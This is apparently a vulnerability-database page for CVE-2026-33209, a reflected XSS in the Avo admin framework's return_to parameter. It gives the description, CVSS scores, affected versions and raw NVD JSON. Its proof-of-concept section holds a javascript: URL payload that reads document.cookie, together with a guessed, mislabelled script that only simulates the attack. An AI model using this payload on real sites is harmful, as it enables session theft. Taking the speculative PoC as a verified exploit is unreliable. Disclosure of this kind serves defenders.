Security Vulnerability Report
中文
CVE-2026-33209 CVSS 6.1 MEDIUM

CVE-2026-33209

Published: 2026-03-20 23:16:46
Last Modified: 2026-03-23 18:55:38
Source: [email protected]

Description

Avo is a framework to create admin panels for Ruby on Rails apps. Prior to version 3.30.3, a reflected cross-site scripting (XSS) vulnerability exists in the return_to query parameter used in the avo interface. An attacker can craft a malicious URL that injects arbitrary JavaScript, which is executed when he clicks a dynamically generated navigation button. This issue has been patched in version 3.30.3.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:avohq:avo:*:*:*:*:*:ruby:*:* - VULNERABLE
Avo < 3.30.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-33209: Reflected XSS in Avo return_to parameter Usage: Access the vulnerable URL with the payload and click the dynamic button. --> <!-- Malicious URL Example --> <!-- https://target.com/avo?return_to=javascript:alert(document.cookie) --> <script> // Simulated payload that would be injected via the 'return_to' parameter // In a real attack, this is triggered by the UI action. console.log("[PoC] Attempting to trigger XSS via return_to parameter..."); // The vulnerable component likely constructs a link or button like this: // <a href="[USER_INPUT]">Go Back</a> // Where [USER_INPUT] is the value of 'return_to'. var maliciousPayload = "javascript:alert('CVE-2026-33209 XSS Triggered');"; // Hypothetical Check: if (window.location.href.includes("return_to")) { alert("If you clicked a navigation button and saw an alert, the system is vulnerable."); } </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33209", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:45.843", "lastModified": "2026-03-23T18:55:37.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Avo is a framework to create admin panels for Ruby on Rails apps. Prior to version 3.30.3, a reflected cross-site scripting (XSS) vulnerability exists in the return_to query parameter used in the avo interface. An attacker can craft a malicious URL that injects arbitrary JavaScript, which is executed when he clicks a dynamically generated navigation button. This issue has been patched in version 3.30.3."}, {"lang": "es", "value": "Avo es un framework para crear paneles de administración para aplicaciones Ruby on Rails. Antes de la versión 3.30.3, existe una vulnerabilidad de cross-site scripting (XSS) reflejado en el parámetro de consulta return_to utilizado en la interfaz de Avo. Un atacante puede crear una URL maliciosa que inyecta JavaScript arbitrario, que se ejecuta cuando hace clic en un botón de navegación generado dinámicamente. Este problema ha sido parcheado en la versión 3.30.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:avohq:avo:*:*:*:*:*:ruby:*:*", "versionEndExcluding": "3.30.3", "matchCriteriaId": "4A86C431-F184-4E7E-B28F-2248E58FDB0B"}]}]}], "references": [{"url": "https://github.com/avo-hq/avo/commit/4453d39ddc6309f3bc8ada73ef21e1971112de7d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/avo-hq/avo/pull/4330", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/avo-hq/avo/releases/tag/v3.30.3", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/avo-hq/avo/security/advisories/GHSA-762r-27w2-q22j", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.